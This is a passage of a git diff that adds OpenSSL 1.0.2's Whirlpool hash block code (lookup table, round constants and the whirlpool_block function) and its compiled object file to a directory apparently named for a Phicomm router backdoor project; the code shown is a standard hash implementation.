+            LL(0x22, 0x22, 0x88, 0x22, 0x0d, 0xaa, 0x44, 0x2f),
+            LL(0x64, 0x64, 0x8d, 0x64, 0x07, 0xe9, 0xc8, 0x63),
+            LL(0xf1, 0xf1, 0xe3, 0xf1, 0xdb, 0x12, 0xff, 0x2a),
+            LL(0x73, 0x73, 0xd1, 0x73, 0xbf, 0xa2, 0xe6, 0xcc),
+            LL(0x12, 0x12, 0x48, 0x12, 0x90, 0x5a, 0x24, 0x82),
+            LL(0x40, 0x40, 0x1d, 0x40, 0x3a, 0x5d, 0x80, 0x7a),
+            LL(0x08, 0x08, 0x20, 0x08, 0x40, 0x28, 0x10, 0x48),
+            LL(0xc3, 0xc3, 0x2b, 0xc3, 0x56, 0xe8, 0x9b, 0x95),
+            LL(0xec, 0xec, 0x97, 0xec, 0x33, 0x7b, 0xc5, 0xdf),
+            LL(0xdb, 0xdb, 0x4b, 0xdb, 0x96, 0x90, 0xab, 0x4d),
+            LL(0xa1, 0xa1, 0xbe, 0xa1, 0x61, 0x1f, 0x5f, 0xc0),
+            LL(0x8d, 0x8d, 0x0e, 0x8d, 0x1c, 0x83, 0x07, 0x91),
+            LL(0x3d, 0x3d, 0xf4, 0x3d, 0xf5, 0xc9, 0x7a, 0xc8),
+            LL(0x97, 0x97, 0x66, 0x97, 0xcc, 0xf1, 0x33, 0x5b),
+            LL(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00),
+            LL(0xcf, 0xcf, 0x1b, 0xcf, 0x36, 0xd4, 0x83, 0xf9),
+            LL(0x2b, 0x2b, 0xac, 0x2b, 0x45, 0x87, 0x56, 0x6e),
+            LL(0x76, 0x76, 0xc5, 0x76, 0x97, 0xb3, 0xec, 0xe1),
+            LL(0x82, 0x82, 0x32, 0x82, 0x64, 0xb0, 0x19, 0xe6),
+            LL(0xd6, 0xd6, 0x7f, 0xd6, 0xfe, 0xa9, 0xb1, 0x28),
+            LL(0x1b, 0x1b, 0x6c, 0x1b, 0xd8, 0x77, 0x36, 0xc3),
+            LL(0xb5, 0xb5, 0xee, 0xb5, 0xc1, 0x5b, 0x77, 0x74),
+            LL(0xaf, 0xaf, 0x86, 0xaf, 0x11, 0x29, 0x43, 0xbe),
+            LL(0x6a, 0x6a, 0xb5, 0x6a, 0x77, 0xdf, 0xd4, 0x1d),
+            LL(0x50, 0x50, 0x5d, 0x50, 0xba, 0x0d, 0xa0, 0xea),
+            LL(0x45, 0x45, 0x09, 0x45, 0x12, 0x4c, 0x8a, 0x57),
+            LL(0xf3, 0xf3, 0xeb, 0xf3, 0xcb, 0x18, 0xfb, 0x38),
+            LL(0x30, 0x30, 0xc0, 0x30, 0x9d, 0xf0, 0x60, 0xad),
+            LL(0xef, 0xef, 0x9b, 0xef, 0x2b, 0x74, 0xc3, 0xc4),
+            LL(0x3f, 0x3f, 0xfc, 0x3f, 0xe5, 0xc3, 0x7e, 0xda),
+            LL(0x55, 0x55, 0x49, 0x55, 0x92, 0x1c, 0xaa, 0xc7),
+            LL(0xa2, 0xa2, 0xb2, 0xa2, 0x79, 0x10, 0x59, 0xdb),
+            LL(0xea, 0xea, 0x8f, 0xea, 0x03, 0x65, 0xc9, 0xe9),
+            LL(0x65, 0x65, 0x89, 0x65, 0x0f, 0xec, 0xca, 0x6a),
+            LL(0xba, 0xba, 0xd2, 0xba, 0xb9, 0x68, 0x69, 0x03),
+            LL(0x2f, 0x2f, 0xbc, 0x2f, 0x65, 0x93, 0x5e, 0x4a),
+            LL(0xc0, 0xc0, 0x27, 0xc0, 0x4e, 0xe7, 0x9d, 0x8e),
+            LL(0xde, 0xde, 0x5f, 0xde, 0xbe, 0x81, 0xa1, 0x60),
+            LL(0x1c, 0x1c, 0x70, 0x1c, 0xe0, 0x6c, 0x38, 0xfc),
+            LL(0xfd, 0xfd, 0xd3, 0xfd, 0xbb, 0x2e, 0xe7, 0x46),
+            LL(0x4d, 0x4d, 0x29, 0x4d, 0x52, 0x64, 0x9a, 0x1f),
+            LL(0x92, 0x92, 0x72, 0x92, 0xe4, 0xe0, 0x39, 0x76),
+            LL(0x75, 0x75, 0xc9, 0x75, 0x8f, 0xbc, 0xea, 0xfa),
+            LL(0x06, 0x06, 0x18, 0x06, 0x30, 0x1e, 0x0c, 0x36),
+            LL(0x8a, 0x8a, 0x12, 0x8a, 0x24, 0x98, 0x09, 0xae),
+            LL(0xb2, 0xb2, 0xf2, 0xb2, 0xf9, 0x40, 0x79, 0x4b),
+            LL(0xe6, 0xe6, 0xbf, 0xe6, 0x63, 0x59, 0xd1, 0x85),
+            LL(0x0e, 0x0e, 0x38, 0x0e, 0x70, 0x36, 0x1c, 0x7e),
+            LL(0x1f, 0x1f, 0x7c, 0x1f, 0xf8, 0x63, 0x3e, 0xe7),
+            LL(0x62, 0x62, 0x95, 0x62, 0x37, 0xf7, 0xc4, 0x55),
+            LL(0xd4, 0xd4, 0x77, 0xd4, 0xee, 0xa3, 0xb5, 0x3a),
+            LL(0xa8, 0xa8, 0x9a, 0xa8, 0x29, 0x32, 0x4d, 0x81),
+            LL(0x96, 0x96, 0x62, 0x96, 0xc4, 0xf4, 0x31, 0x52),
+            LL(0xf9, 0xf9, 0xc3, 0xf9, 0x9b, 0x3a, 0xef, 0x62),
+            LL(0xc5, 0xc5, 0x33, 0xc5, 0x66, 0xf6, 0x97, 0xa3),
+            LL(0x25, 0x25, 0x94, 0x25, 0x35, 0xb1, 0x4a, 0x10),
+            LL(0x59, 0x59, 0x79, 0x59, 0xf2, 0x20, 0xb2, 0xab),
+            LL(0x84, 0x84, 0x2a, 0x84, 0x54, 0xae, 0x15, 0xd0),
+            LL(0x72, 0x72, 0xd5, 0x72, 0xb7, 0xa7, 0xe4, 0xc5),
+            LL(0x39, 0x39, 0xe4, 0x39, 0xd5, 0xdd, 0x72, 0xec),
+            LL(0x4c, 0x4c, 0x2d, 0x4c, 0x5a, 0x61, 0x98, 0x16),
+            LL(0x5e, 0x5e, 0x65, 0x5e, 0xca, 0x3b, 0xbc, 0x94),
+            LL(0x78, 0x78, 0xfd, 0x78, 0xe7, 0x85, 0xf0, 0x9f),
+            LL(0x38, 0x38, 0xe0, 0x38, 0xdd, 0xd8, 0x70, 0xe5),
+            LL(0x8c, 0x8c, 0x0a, 0x8c, 0x14, 0x86, 0x05, 0x98),
+            LL(0xd1, 0xd1, 0x63, 0xd1, 0xc6, 0xb2, 0xbf, 0x17),
+            LL(0xa5, 0xa5, 0xae, 0xa5, 0x41, 0x0b, 0x57, 0xe4),
+            LL(0xe2, 0xe2, 0xaf, 0xe2, 0x43, 0x4d, 0xd9, 0xa1),
+            LL(0x61, 0x61, 0x99, 0x61, 0x2f, 0xf8, 0xc2, 0x4e),
+            LL(0xb3, 0xb3, 0xf6, 0xb3, 0xf1, 0x45, 0x7b, 0x42),
+            LL(0x21, 0x21, 0x84, 0x21, 0x15, 0xa5, 0x42, 0x34),
+            LL(0x9c, 0x9c, 0x4a, 0x9c, 0x94, 0xd6, 0x25, 0x08),
+            LL(0x1e, 0x1e, 0x78, 0x1e, 0xf0, 0x66, 0x3c, 0xee),
+            LL(0x43, 0x43, 0x11, 0x43, 0x22, 0x52, 0x86, 0x61),
+            LL(0xc7, 0xc7, 0x3b, 0xc7, 0x76, 0xfc, 0x93, 0xb1),
+            LL(0xfc, 0xfc, 0xd7, 0xfc, 0xb3, 0x2b, 0xe5, 0x4f),
+            LL(0x04, 0x04, 0x10, 0x04, 0x20, 0x14, 0x08, 0x24),
+            LL(0x51, 0x51, 0x59, 0x51, 0xb2, 0x08, 0xa2, 0xe3),
+            LL(0x99, 0x99, 0x5e, 0x99, 0xbc, 0xc7, 0x2f, 0x25),
+            LL(0x6d, 0x6d, 0xa9, 0x6d, 0x4f, 0xc4, 0xda, 0x22),
+            LL(0x0d, 0x0d, 0x34, 0x0d, 0x68, 0x39, 0x1a, 0x65),
+            LL(0xfa, 0xfa, 0xcf, 0xfa, 0x83, 0x35, 0xe9, 0x79),
+            LL(0xdf, 0xdf, 0x5b, 0xdf, 0xb6, 0x84, 0xa3, 0x69),
+            LL(0x7e, 0x7e, 0xe5, 0x7e, 0xd7, 0x9b, 0xfc, 0xa9),
+            LL(0x24, 0x24, 0x90, 0x24, 0x3d, 0xb4, 0x48, 0x19),
+            LL(0x3b, 0x3b, 0xec, 0x3b, 0xc5, 0xd7, 0x76, 0xfe),
+            LL(0xab, 0xab, 0x96, 0xab, 0x31, 0x3d, 0x4b, 0x9a),
+            LL(0xce, 0xce, 0x1f, 0xce, 0x3e, 0xd1, 0x81, 0xf0),
+            LL(0x11, 0x11, 0x44, 0x11, 0x88, 0x55, 0x22, 0x99),
+            LL(0x8f, 0x8f, 0x06, 0x8f, 0x0c, 0x89, 0x03, 0x83),
+            LL(0x4e, 0x4e, 0x25, 0x4e, 0x4a, 0x6b, 0x9c, 0x04),
+            LL(0xb7, 0xb7, 0xe6, 0xb7, 0xd1, 0x51, 0x73, 0x66),
+            LL(0xeb, 0xeb, 0x8b, 0xeb, 0x0b, 0x60, 0xcb, 0xe0),
+            LL(0x3c, 0x3c, 0xf0, 0x3c, 0xfd, 0xcc, 0x78, 0xc1),
+            LL(0x81, 0x81, 0x3e, 0x81, 0x7c, 0xbf, 0x1f, 0xfd),
+            LL(0x94, 0x94, 0x6a, 0x94, 0xd4, 0xfe, 0x35, 0x40),
+            LL(0xf7, 0xf7, 0xfb, 0xf7, 0xeb, 0x0c, 0xf3, 0x1c),
+            LL(0xb9, 0xb9, 0xde, 0xb9, 0xa1, 0x67, 0x6f, 0x18),
+            LL(0x13, 0x13, 0x4c, 0x13, 0x98, 0x5f, 0x26, 0x8b),
+            LL(0x2c, 0x2c, 0xb0, 0x2c, 0x7d, 0x9c, 0x58, 0x51),
+            LL(0xd3, 0xd3, 0x6b, 0xd3, 0xd6, 0xb8, 0xbb, 0x05),
+            LL(0xe7, 0xe7, 0xbb, 0xe7, 0x6b, 0x5c, 0xd3, 0x8c),
+            LL(0x6e, 0x6e, 0xa5, 0x6e, 0x57, 0xcb, 0xdc, 0x39),
+            LL(0xc4, 0xc4, 0x37, 0xc4, 0x6e, 0xf3, 0x95, 0xaa),
+            LL(0x03, 0x03, 0x0c, 0x03, 0x18, 0x0f, 0x06, 0x1b),
+            LL(0x56, 0x56, 0x45, 0x56, 0x8a, 0x13, 0xac, 0xdc),
+            LL(0x44, 0x44, 0x0d, 0x44, 0x1a, 0x49, 0x88, 0x5e),
+            LL(0x7f, 0x7f, 0xe1, 0x7f, 0xdf, 0x9e, 0xfe, 0xa0),
+            LL(0xa9, 0xa9, 0x9e, 0xa9, 0x21, 0x37, 0x4f, 0x88),
+            LL(0x2a, 0x2a, 0xa8, 0x2a, 0x4d, 0x82, 0x54, 0x67),
+            LL(0xbb, 0xbb, 0xd6, 0xbb, 0xb1, 0x6d, 0x6b, 0x0a),
+            LL(0xc1, 0xc1, 0x23, 0xc1, 0x46, 0xe2, 0x9f, 0x87),
+            LL(0x53, 0x53, 0x51, 0x53, 0xa2, 0x02, 0xa6, 0xf1),
+            LL(0xdc, 0xdc, 0x57, 0xdc, 0xae, 0x8b, 0xa5, 0x72),
+            LL(0x0b, 0x0b, 0x2c, 0x0b, 0x58, 0x27, 0x16, 0x53),
+            LL(0x9d, 0x9d, 0x4e, 0x9d, 0x9c, 0xd3, 0x27, 0x01),
+            LL(0x6c, 0x6c, 0xad, 0x6c, 0x47, 0xc1, 0xd8, 0x2b),
+            LL(0x31, 0x31, 0xc4, 0x31, 0x95, 0xf5, 0x62, 0xa4),
+            LL(0x74, 0x74, 0xcd, 0x74, 0x87, 0xb9, 0xe8, 0xf3),
+            LL(0xf6, 0xf6, 0xff, 0xf6, 0xe3, 0x09, 0xf1, 0x15),
+            LL(0x46, 0x46, 0x05, 0x46, 0x0a, 0x43, 0x8c, 0x4c),
+            LL(0xac, 0xac, 0x8a, 0xac, 0x09, 0x26, 0x45, 0xa5),
+            LL(0x89, 0x89, 0x1e, 0x89, 0x3c, 0x97, 0x0f, 0xb5),
+            LL(0x14, 0x14, 0x50, 0x14, 0xa0, 0x44, 0x28, 0xb4),
+            LL(0xe1, 0xe1, 0xa3, 0xe1, 0x5b, 0x42, 0xdf, 0xba),
+            LL(0x16, 0x16, 0x58, 0x16, 0xb0, 0x4e, 0x2c, 0xa6),
+            LL(0x3a, 0x3a, 0xe8, 0x3a, 0xcd, 0xd2, 0x74, 0xf7),
+            LL(0x69, 0x69, 0xb9, 0x69, 0x6f, 0xd0, 0xd2, 0x06),
+            LL(0x09, 0x09, 0x24, 0x09, 0x48, 0x2d, 0x12, 0x41),
+            LL(0x70, 0x70, 0xdd, 0x70, 0xa7, 0xad, 0xe0, 0xd7),
+            LL(0xb6, 0xb6, 0xe2, 0xb6, 0xd9, 0x54, 0x71, 0x6f),
+            LL(0xd0, 0xd0, 0x67, 0xd0, 0xce, 0xb7, 0xbd, 0x1e),
+            LL(0xed, 0xed, 0x93, 0xed, 0x3b, 0x7e, 0xc7, 0xd6),
+            LL(0xcc, 0xcc, 0x17, 0xcc, 0x2e, 0xdb, 0x85, 0xe2),
+            LL(0x42, 0x42, 0x15, 0x42, 0x2a, 0x57, 0x84, 0x68),
+            LL(0x98, 0x98, 0x5a, 0x98, 0xb4, 0xc2, 0x2d, 0x2c),
+            LL(0xa4, 0xa4, 0xaa, 0xa4, 0x49, 0x0e, 0x55, 0xed),
+            LL(0x28, 0x28, 0xa0, 0x28, 0x5d, 0x88, 0x50, 0x75),
+            LL(0x5c, 0x5c, 0x6d, 0x5c, 0xda, 0x31, 0xb8, 0x86),
+            LL(0xf8, 0xf8, 0xc7, 0xf8, 0x93, 0x3f, 0xed, 0x6b),
+            LL(0x86, 0x86, 0x22, 0x86, 0x44, 0xa4, 0x11, 0xc2),
+#define RC      (&(Cx.q[256*N]))
+            0x18, 0x23, 0xc6, 0xe8, 0x87, 0xb8, 0x01, 0x4f,
+            /* rc[ROUNDS] */
+            0x36, 0xa6, 0xd2, 0xf5, 0x79, 0x6f, 0x91, 0x52, 0x60, 0xbc, 0x9b,
+            0x8e, 0xa3, 0x0c, 0x7b, 0x35, 0x1d, 0xe0, 0xd7, 0xc2, 0x2e, 0x4b,
+            0xfe, 0x57, 0x15, 0x77, 0x37, 0xe5, 0x9f, 0xf0, 0x4a, 0xda, 0x58,
+            0xc9, 0x29, 0x0a, 0xb1, 0xa0, 0x6b, 0x85, 0xbd, 0x5d, 0x10, 0xf4,
+            0xcb, 0x3e, 0x05, 0x67, 0xe4, 0x27, 0x41, 0x8b, 0xa7, 0x7d, 0x95,
+            0xd8, 0xfb, 0xee, 0x7c, 0x66, 0xdd, 0x17, 0x47, 0x9e, 0xca, 0x2d,
+            0xbf, 0x07, 0xad, 0x5a, 0x83, 0x33
+        }
+    };
+
+void whirlpool_block(WHIRLPOOL_CTX *ctx, const void *inp, size_t n)
+{
+    int r;
+    const u8 *p = inp;
+    union {
+        u64 q[8];
+        u8 c[64];
+    } S, K, *H = (void *)ctx->H.q;
+
+#ifdef GO_FOR_MMX
+    GO_FOR_MMX(ctx, inp, n);
+#endif
+    do {
+#ifdef OPENSSL_SMALL_FOOTPRINT
+        u64 L[8];
+        int i;
+
+        for (i = 0; i < 64; i++)
+            S.c[i] = (K.c[i] = H->c[i]) ^ p[i];
+        for (r = 0; r < ROUNDS; r++) {
+            for (i = 0; i < 8; i++) {
+                L[i] = i ? 0 : RC[r];
+                L[i] ^= C0(K, i) ^ C1(K, (i - 1) & 7) ^
+                    C2(K, (i - 2) & 7) ^ C3(K, (i - 3) & 7) ^
+                    C4(K, (i - 4) & 7) ^ C5(K, (i - 5) & 7) ^
+                    C6(K, (i - 6) & 7) ^ C7(K, (i - 7) & 7);
+            }
+            memcpy(K.q, L, 64);
+            for (i = 0; i < 8; i++) {
+                L[i] ^= C0(S, i) ^ C1(S, (i - 1) & 7) ^
+                    C2(S, (i - 2) & 7) ^ C3(S, (i - 3) & 7) ^
+                    C4(S, (i - 4) & 7) ^ C5(S, (i - 5) & 7) ^
+                    C6(S, (i - 6) & 7) ^ C7(S, (i - 7) & 7);
+            }
+            memcpy(S.q, L, 64);
+        }
+        for (i = 0; i < 64; i++)
+            H->c[i] ^= S.c[i] ^ p[i];
+#else
+        u64 L0, L1, L2, L3, L4, L5, L6, L7;
+
+# ifdef STRICT_ALIGNMENT
+        if ((size_t)p & 7) {
+            memcpy(S.c, p, 64);
+            S.q[0] ^= (K.q[0] = H->q[0]);
+            S.q[1] ^= (K.q[1] = H->q[1]);
+            S.q[2] ^= (K.q[2] = H->q[2]);
+            S.q[3] ^= (K.q[3] = H->q[3]);
+            S.q[4] ^= (K.q[4] = H->q[4]);
+            S.q[5] ^= (K.q[5] = H->q[5]);
+            S.q[6] ^= (K.q[6] = H->q[6]);
+            S.q[7] ^= (K.q[7] = H->q[7]);
+        } else
+# endif
+        {
+            const u64 *pa = (const u64 *)p;
+            S.q[0] = (K.q[0] = H->q[0]) ^ pa[0];
+            S.q[1] = (K.q[1] = H->q[1]) ^ pa[1];
+            S.q[2] = (K.q[2] = H->q[2]) ^ pa[2];
+            S.q[3] = (K.q[3] = H->q[3]) ^ pa[3];
+            S.q[4] = (K.q[4] = H->q[4]) ^ pa[4];
+            S.q[5] = (K.q[5] = H->q[5]) ^ pa[5];
+            S.q[6] = (K.q[6] = H->q[6]) ^ pa[6];
+            S.q[7] = (K.q[7] = H->q[7]) ^ pa[7];
+        }
+
+        for (r = 0; r < ROUNDS; r++) {
+# ifdef SMALL_REGISTER_BANK
+            L0 = C0(K, 0) ^ C1(K, 7) ^ C2(K, 6) ^ C3(K, 5) ^
+                C4(K, 4) ^ C5(K, 3) ^ C6(K, 2) ^ C7(K, 1) ^ RC[r];
+            L1 = C0(K, 1) ^ C1(K, 0) ^ C2(K, 7) ^ C3(K, 6) ^
+                C4(K, 5) ^ C5(K, 4) ^ C6(K, 3) ^ C7(K, 2);
+            L2 = C0(K, 2) ^ C1(K, 1) ^ C2(K, 0) ^ C3(K, 7) ^
+                C4(K, 6) ^ C5(K, 5) ^ C6(K, 4) ^ C7(K, 3);
+            L3 = C0(K, 3) ^ C1(K, 2) ^ C2(K, 1) ^ C3(K, 0) ^
+                C4(K, 7) ^ C5(K, 6) ^ C6(K, 5) ^ C7(K, 4);
+            L4 = C0(K, 4) ^ C1(K, 3) ^ C2(K, 2) ^ C3(K, 1) ^
+                C4(K, 0) ^ C5(K, 7) ^ C6(K, 6) ^ C7(K, 5);
+            L5 = C0(K, 5) ^ C1(K, 4) ^ C2(K, 3) ^ C3(K, 2) ^
+                C4(K, 1) ^ C5(K, 0) ^ C6(K, 7) ^ C7(K, 6);
+            L6 = C0(K, 6) ^ C1(K, 5) ^ C2(K, 4) ^ C3(K, 3) ^
+                C4(K, 2) ^ C5(K, 1) ^ C6(K, 0) ^ C7(K, 7);
+            L7 = C0(K, 7) ^ C1(K, 6) ^ C2(K, 5) ^ C3(K, 4) ^
+                C4(K, 3) ^ C5(K, 2) ^ C6(K, 1) ^ C7(K, 0);
+
+            K.q[0] = L0;
+            K.q[1] = L1;
+            K.q[2] = L2;
+            K.q[3] = L3;
+            K.q[4] = L4;
+            K.q[5] = L5;
+            K.q[6] = L6;
+            K.q[7] = L7;
+
+            L0 ^= C0(S, 0) ^ C1(S, 7) ^ C2(S, 6) ^ C3(S, 5) ^
+                C4(S, 4) ^ C5(S, 3) ^ C6(S, 2) ^ C7(S, 1);
+            L1 ^= C0(S, 1) ^ C1(S, 0) ^ C2(S, 7) ^ C3(S, 6) ^
+                C4(S, 5) ^ C5(S, 4) ^ C6(S, 3) ^ C7(S, 2);
+            L2 ^= C0(S, 2) ^ C1(S, 1) ^ C2(S, 0) ^ C3(S, 7) ^
+                C4(S, 6) ^ C5(S, 5) ^ C6(S, 4) ^ C7(S, 3);
+            L3 ^= C0(S, 3) ^ C1(S, 2) ^ C2(S, 1) ^ C3(S, 0) ^
+                C4(S, 7) ^ C5(S, 6) ^ C6(S, 5) ^ C7(S, 4);
+            L4 ^= C0(S, 4) ^ C1(S, 3) ^ C2(S, 2) ^ C3(S, 1) ^
+                C4(S, 0) ^ C5(S, 7) ^ C6(S, 6) ^ C7(S, 5);
+            L5 ^= C0(S, 5) ^ C1(S, 4) ^ C2(S, 3) ^ C3(S, 2) ^
+                C4(S, 1) ^ C5(S, 0) ^ C6(S, 7) ^ C7(S, 6);
+            L6 ^= C0(S, 6) ^ C1(S, 5) ^ C2(S, 4) ^ C3(S, 3) ^
+                C4(S, 2) ^ C5(S, 1) ^ C6(S, 0) ^ C7(S, 7);
+            L7 ^= C0(S, 7) ^ C1(S, 6) ^ C2(S, 5) ^ C3(S, 4) ^
+                C4(S, 3) ^ C5(S, 2) ^ C6(S, 1) ^ C7(S, 0);
+
+            S.q[0] = L0;
+            S.q[1] = L1;
+            S.q[2] = L2;
+            S.q[3] = L3;
+            S.q[4] = L4;
+            S.q[5] = L5;
+            S.q[6] = L6;
+            S.q[7] = L7;
+# else
+            L0 = C0(K, 0);
+            L1 = C1(K, 0);
+            L2 = C2(K, 0);
+            L3 = C3(K, 0);
+            L4 = C4(K, 0);
+            L5 = C5(K, 0);
+            L6 = C6(K, 0);
+            L7 = C7(K, 0);
+            L0 ^= RC[r];
+
+            L1 ^= C0(K, 1);
+            L2 ^= C1(K, 1);
+            L3 ^= C2(K, 1);
+            L4 ^= C3(K, 1);
+            L5 ^= C4(K, 1);
+            L6 ^= C5(K, 1);
+            L7 ^= C6(K, 1);
+            L0 ^= C7(K, 1);
+
+            L2 ^= C0(K, 2);
+            L3 ^= C1(K, 2);
+            L4 ^= C2(K, 2);
+            L5 ^= C3(K, 2);
+            L6 ^= C4(K, 2);
+            L7 ^= C5(K, 2);
+            L0 ^= C6(K, 2);
+            L1 ^= C7(K, 2);
+
+            L3 ^= C0(K, 3);
+            L4 ^= C1(K, 3);
+            L5 ^= C2(K, 3);
+            L6 ^= C3(K, 3);
+            L7 ^= C4(K, 3);
+            L0 ^= C5(K, 3);
+            L1 ^= C6(K, 3);
+            L2 ^= C7(K, 3);
+
+            L4 ^= C0(K, 4);
+            L5 ^= C1(K, 4);
+            L6 ^= C2(K, 4);
+            L7 ^= C3(K, 4);
+            L0 ^= C4(K, 4);
+            L1 ^= C5(K, 4);
+            L2 ^= C6(K, 4);
+            L3 ^= C7(K, 4);
+
+            L5 ^= C0(K, 5);
+            L6 ^= C1(K, 5);
+            L7 ^= C2(K, 5);
+            L0 ^= C3(K, 5);
+            L1 ^= C4(K, 5);
+            L2 ^= C5(K, 5);
+            L3 ^= C6(K, 5);
+            L4 ^= C7(K, 5);
+
+            L6 ^= C0(K, 6);
+            L7 ^= C1(K, 6);
+            L0 ^= C2(K, 6);
+            L1 ^= C3(K, 6);
+            L2 ^= C4(K, 6);
+            L3 ^= C5(K, 6);
+            L4 ^= C6(K, 6);
+            L5 ^= C7(K, 6);
+
+            L7 ^= C0(K, 7);
+            L0 ^= C1(K, 7);
+            L1 ^= C2(K, 7);
+            L2 ^= C3(K, 7);
+            L3 ^= C4(K, 7);
+            L4 ^= C5(K, 7);
+            L5 ^= C6(K, 7);
+            L6 ^= C7(K, 7);
+
+            K.q[0] = L0;
+            K.q[1] = L1;
+            K.q[2] = L2;
+            K.q[3] = L3;
+            K.q[4] = L4;
+            K.q[5] = L5;
+            K.q[6] = L6;
+            K.q[7] = L7;
+
+            L0 ^= C0(S, 0);
+            L1 ^= C1(S, 0);
+            L2 ^= C2(S, 0);
+            L3 ^= C3(S, 0);
+            L4 ^= C4(S, 0);
+            L5 ^= C5(S, 0);
+            L6 ^= C6(S, 0);
+            L7 ^= C7(S, 0);
+
+            L1 ^= C0(S, 1);
+            L2 ^= C1(S, 1);
+            L3 ^= C2(S, 1);
+            L4 ^= C3(S, 1);
+            L5 ^= C4(S, 1);
+            L6 ^= C5(S, 1);
+            L7 ^= C6(S, 1);
+            L0 ^= C7(S, 1);
+
+            L2 ^= C0(S, 2);
+            L3 ^= C1(S, 2);
+            L4 ^= C2(S, 2);
+            L5 ^= C3(S, 2);
+            L6 ^= C4(S, 2);
+            L7 ^= C5(S, 2);
+            L0 ^= C6(S, 2);
+            L1 ^= C7(S, 2);
+
+            L3 ^= C0(S, 3);
+            L4 ^= C1(S, 3);
+            L5 ^= C2(S, 3);
+            L6 ^= C3(S, 3);
+            L7 ^= C4(S, 3);
+            L0 ^= C5(S, 3);
+            L1 ^= C6(S, 3);
+            L2 ^= C7(S, 3);
+
+            L4 ^= C0(S, 4);
+            L5 ^= C1(S, 4);
+            L6 ^= C2(S, 4);
+            L7 ^= C3(S, 4);
+            L0 ^= C4(S, 4);
+            L1 ^= C5(S, 4);
+            L2 ^= C6(S, 4);
+            L3 ^= C7(S, 4);
+
+            L5 ^= C0(S, 5);
+            L6 ^= C1(S, 5);
+            L7 ^= C2(S, 5);
+            L0 ^= C3(S, 5);
+            L1 ^= C4(S, 5);
+            L2 ^= C5(S, 5);
+            L3 ^= C6(S, 5);
+            L4 ^= C7(S, 5);
+
+            L6 ^= C0(S, 6);
+            L7 ^= C1(S, 6);
+            L0 ^= C2(S, 6);
+            L1 ^= C3(S, 6);
+            L2 ^= C4(S, 6);
+            L3 ^= C5(S, 6);
+            L4 ^= C6(S, 6);
+            L5 ^= C7(S, 6);
+
+            L7 ^= C0(S, 7);
+            L0 ^= C1(S, 7);
+            L1 ^= C2(S, 7);
+            L2 ^= C3(S, 7);
+            L3 ^= C4(S, 7);
+            L4 ^= C5(S, 7);
+            L5 ^= C6(S, 7);
+            L6 ^= C7(S, 7);
+
+            S.q[0] = L0;
+            S.q[1] = L1;
+            S.q[2] = L2;
+            S.q[3] = L3;
+            S.q[4] = L4;
+            S.q[5] = L5;
+            S.q[6] = L6;
+            S.q[7] = L7;
+# endif
+        }
+
+# ifdef STRICT_ALIGNMENT
+        if ((size_t)p & 7) {
+            int i;
+            for (i = 0; i < 64; i++)
+                H->c[i] ^= S.c[i] ^ p[i];
+        } else
+# endif
+        {
+            const u64 *pa = (const u64 *)p;
+            H->q[0] ^= S.q[0] ^ pa[0];
+            H->q[1] ^= S.q[1] ^ pa[1];
+            H->q[2] ^= S.q[2] ^ pa[2];
+            H->q[3] ^= S.q[3] ^ pa[3];
+            H->q[4] ^= S.q[4] ^ pa[4];
+            H->q[5] ^= S.q[5] ^ pa[5];
+            H->q[6] ^= S.q[6] ^ pa[6];
+            H->q[7] ^= S.q[7] ^ pa[7];
+        }
+#endif
+        p += 64;
+    } while (--n);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_block.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_block.o
new file mode 100644
index 0000000000000000000000000000000000000000..c432907373a6108936d71c164b0976978838fc7e
GIT binary patch
literal 9232
zcmbuEd0b3k+s9|xk;)Pw3=Tq4CS-4Ksxy@oA?*>ZT9iF1jA`t<5VB{_9<n9-PJ2mF
zR7zS1J=cBCTx0Zj{(0Z?`OJLp^ShS&I`=jwmRZr(3S2G+FD_>S=g%Fg9L{>)pSCH}
zH05Y;+H>kOd;Kt*YBt5p)y&0pvS4|o9z+X7o2k{{B#>wmSAoQiOH0fZXo;N?Epb-#
z6Nr`i>k)$}p3(t-qYQ!AMvWGGs0qZwY>jRUM3$5qF%}aiv5gijN}`gX4K7;5sKq$N
zQ{}8(huDv>b{%5Zk=komJCE2;vvwY_^Q87B)~-kFmsq<VvFl0gWGJA2LxCuj$|k;i
z1LB%Nn&1X{5G5eS?TivnsX+h~X-MM5HYUV53rrxHkN^{DUM-SWq6`)eae2l>TT-T$
znirC&T%t<G6C=6(0u)N3xwaCU7AtNZH&5uBC-BX46jMdCSU-mec_;NP0m}REsX|+^
zei7qC#){;7|F@3=pUM@8b+Z|t9M%RsIP&!i8L3z%Iq>y!87WUD+41$+Kr+zKF$99d
zdR53Id(71!lOR1C*eH{r5cXm6Ws*H#mzBsoVR~IQ{U@0OUhEUr%1dnZzd(YT)2ITO
z4Z3DC{AML9ZUdAp^lfnDQ*2EwGGBNYwt!NZ<S5q7apdcMWwMg>!NfN>p!AvXgp@?8
zVZ6S|BnWJ@ZMny&-~Un>NeR+HBb_Rg*{rxNP;jl#w}tUgmURf#vNfp4Bp7G5Lsgk%
z$Jec80?T9>9mU399r?yhOh;tBLKl$Ufp7eSkt!KaB7xU;MyiuZ;MF8($zaqU|5V9Y
zBForBOJaW0qDU%?7Lg9qsCKf_;ISHoqH0i6DRoAz68cubV^s)6WuT@|?HRRH=vxX;
zR$?ovB(54Da;pTsRknQHa$8XmS<;$BBb$PT1w(`nP#P_Arve~P5>*6u+&ox6-~m%@
z3#%Q*g`HTk6I-pUD(1O}C#)=XseF@{*uZ9xNIlgu6XeWh$0mtVkWb65sy3_y9$a`(
zsHKVth$~lMiu?$91W>XQTa5!OGa)=7>4Ka*%p=3&eIi0V3gE#AKjnl9;-N@Jgp3k|
zFge<S09^|tZrs204swp41>zvel;-c|XtB@M@sH7%$<m3*k|oWc&uE>|NeEL%i~J}z
zQh+w7<Y;4Sr$uS(Sq=rkX-SSEp_pPy@4|!&jegSN#gr4N7*crAVm~SX5;8q>Wpbrc
zWUgRAafwF&@d%R^LRFB;-H0AWPGfQ!5yguZr7%Y_vz!hQ6|CeiA=UsZZYjAZo0ycm
zmsI6j%H$M?^($b}6*Gb4cm`jv!Ff=^NGD_xS(=QLCNI5Xq^mLs0@+-*WD*2^WW4Un
zB=CAK;0IAow8Tq+{I)oe<$D<Hq`s3tIR9Z*$>M=CJBMrmV%bhCWVQv;^>7{q@L)zc
